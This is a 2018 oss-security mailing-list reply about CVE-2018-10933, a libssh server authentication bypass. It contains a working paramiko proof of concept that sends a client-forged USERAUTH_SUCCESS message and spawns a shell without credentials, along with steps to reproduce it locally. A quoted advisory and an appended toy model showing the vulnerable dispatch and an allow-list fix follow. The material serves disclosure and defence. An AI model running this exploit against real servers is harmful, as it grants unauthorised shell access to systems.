
List:       oss-security
Subject:    Re: [oss-security] CVE-2018-10933: libssh: authentication bypass in server code
From:       Minh Tuan Luong <not.soledad () gmail ! com>
Date:       2018-10-17 9:13:24
Message-ID: ec0cb776-0caf-c27e-dcff-ff68001900c2 () gmail ! com

I have coded a simple POC for this CVE:

--- CVE-2018-10933.py ----

import paramiko
import socket
import sys

hostname = "127.0.0.1"
port = 2222

sock = socket.socket()
try:
    sock.connect((hostname, port))
    # Instantiate the transport and complete the key exchange; no
    # authentication has taken place at this point.
    transport = paramiko.transport.Transport(sock)
    transport.start_client()

    # Send SSH2_MSG_USERAUTH_SUCCESS (a server-to-client message) in place of
    # the SSH2_MSG_USERAUTH_REQUEST the server expects. A vulnerable libssh
    # server treats the session as authenticated.
    m = paramiko.message.Message()
    m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
    transport._send_message(m)

    # Open a session channel and request a shell without any credentials.
    cmd_channel = transport.open_session()
    cmd_channel.invoke_shell()

except socket.error:
    print('[-] Connecting to host failed. Please check the specified host and port.')
    sys.exit(1)

-----

To test this code, get the vulnerable version of libssh from the homepage:
https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz
After uncompressing and building, go to the example directory; there is a simple
sshd server using libssh named samplesshd-cb.

Run this simple sshd with the command:
     $ samplesshd-cb 127.0.0.1 -p 2222
then run my code. The output will be:
Allocated session channel
Allocated shell
This means that I can bypass authentication and spawn a shell without any
credentials.

Regards, Soledad

On 10/16/2018 7:21 PM, Marcus Meissner wrote:
> Hi,
> 
> https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
> 
> -----
> libssh 0.8.4 and 0.7.6 security and bugfix release
> 
> This is an important security and maintenance release in order to address CVE-2018-10933.
> 
> libssh versions 0.6 and above have an authentication bypass vulnerability in the server code.
> By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the
> SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication,
> the attacker could successfully authenticate without any credentials.
> The bug was discovered by Peter Winter-Smith of NCC Group.
> -----
> 
> This only affects libssh operating in _server_ mode, but not the usually used client mode.
> 
> Ciao, Marcus
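
The following is an added example, not part of Soledad's post or of libssh's own code: a toy Python model of a server-side userauth dispatcher, showing the pre-fix behaviour (a client-sent SSH2_MSG_USERAUTH_SUCCESS is dispatched to a handler that marks the session authenticated) beside a hardened form that refuses server-to-client message types until authentication has completed. The message numbers are the real RFC 4252/4254 values; the credential store, packet format, handler names and packet sequences are constructed for illustration and do not mirror libssh's internals.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Type

# Message numbers from RFC 4252 (userauth) and RFC 4254 (connection).
SSH_MSG_USERAUTH_REQUEST = 50   # client -> server
SSH_MSG_USERAUTH_FAILURE = 51   # server -> client
SSH_MSG_USERAUTH_SUCCESS = 52   # server -> client
SSH_MSG_CHANNEL_OPEN = 90       # either direction, but only after userauth

# Constructed credential store for the toy server (not real data).
VALID_CREDENTIALS = {b"alice": b"correct-horse"}


@dataclass
class Packet:
    msg_type: int
    payload: bytes = b""


@dataclass
class Session:
    authenticated: bool = False
    closed: bool = False
    channels: int = 0
    log: List[str] = field(default_factory=list)


class VulnerableServer:
    """Models the pre-fix dispatch: one handler table for every message type the
    library knows, including USERAUTH_SUCCESS, which only a server should ever
    send. That handler marks the session authenticated unconditionally."""

    def __init__(self) -> None:
        self.session = Session()
        self.handlers: Dict[int, Callable[[Packet], None]] = {
            SSH_MSG_USERAUTH_REQUEST: self._on_userauth_request,
            SSH_MSG_USERAUTH_SUCCESS: self._on_userauth_success,
            SSH_MSG_CHANNEL_OPEN: self._on_channel_open,
        }

    def disconnect(self, reason: str) -> None:
        self.session.closed = True
        self.session.log.append(f"disconnect: {reason}")

    def feed(self, pkt: Packet) -> None:
        if self.session.closed:
            return
        handler = self.handlers.get(pkt.msg_type)
        if handler is None:
            self.disconnect(f"unknown message type {pkt.msg_type}")
            return
        handler(pkt)

    def _on_userauth_request(self, pkt: Packet) -> None:
        # Toy payload format "user:password" (constructed, not the SSH wire format).
        user, _, password = pkt.payload.partition(b":")
        if VALID_CREDENTIALS.get(user) == password:
            self.session.authenticated = True
            self.session.log.append("userauth: success")
        else:
            self.session.log.append("userauth: failure")

    def _on_userauth_success(self, pkt: Packet) -> None:
        # The bug in miniature: a message the *server* emits is accepted from
        # the client and flips the session to authenticated.
        self.session.authenticated = True
        self.session.log.append("userauth: success (client-supplied)")

    def _on_channel_open(self, pkt: Packet) -> None:
        if not self.session.authenticated:
            self.disconnect("channel open before authentication")
            return
        self.session.channels += 1
        self.session.log.append("channel opened")


class FixedServer(VulnerableServer):
    """Hardened form: while unauthenticated, accept only the client-to-server
    userauth message; anything else (including USERAUTH_SUCCESS) ends the session."""

    ALLOWED_BEFORE_AUTH = frozenset({SSH_MSG_USERAUTH_REQUEST})

    def feed(self, pkt: Packet) -> None:
        if not self.session.authenticated and pkt.msg_type not in self.ALLOWED_BEFORE_AUTH:
            self.disconnect(f"message type {pkt.msg_type} not allowed before authentication")
            return
        super().feed(pkt)


def run(server_cls: Type[VulnerableServer], packets: List[Packet]) -> Session:
    """Feed a client-supplied packet sequence to a fresh server and return its state."""
    server = server_cls()
    for pkt in packets:
        server.feed(pkt)
    return server.session


# What the POC above sends: USERAUTH_SUCCESS, then a channel open for the shell.
BYPASS = [Packet(SSH_MSG_USERAUTH_SUCCESS), Packet(SSH_MSG_CHANNEL_OPEN)]
# A legitimate client and one with a wrong password, for comparison.
LEGIT = [Packet(SSH_MSG_USERAUTH_REQUEST, b"alice:correct-horse"), Packet(SSH_MSG_CHANNEL_OPEN)]
WRONG_PASSWORD = [Packet(SSH_MSG_USERAUTH_REQUEST, b"alice:nope"), Packet(SSH_MSG_CHANNEL_OPEN)]

if __name__ == "__main__":
    for name, seq in (("bypass", BYPASS), ("legit", LEGIT), ("wrong password", WRONG_PASSWORD)):
        for cls in (VulnerableServer, FixedServer):
            s = run(cls, seq)
            print(f"{cls.__name__:16} {name:14} authenticated={s.authenticated} channels={s.channels}")
```

The point of the hardened form is the allow-list: the server decides what it is willing to receive in the current protocol stage, rather than dispatching any message type the library has a handler for. A client-to-server direction that carries a server-only message number is a protocol violation and is treated as grounds for disconnect, not as a state transition.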

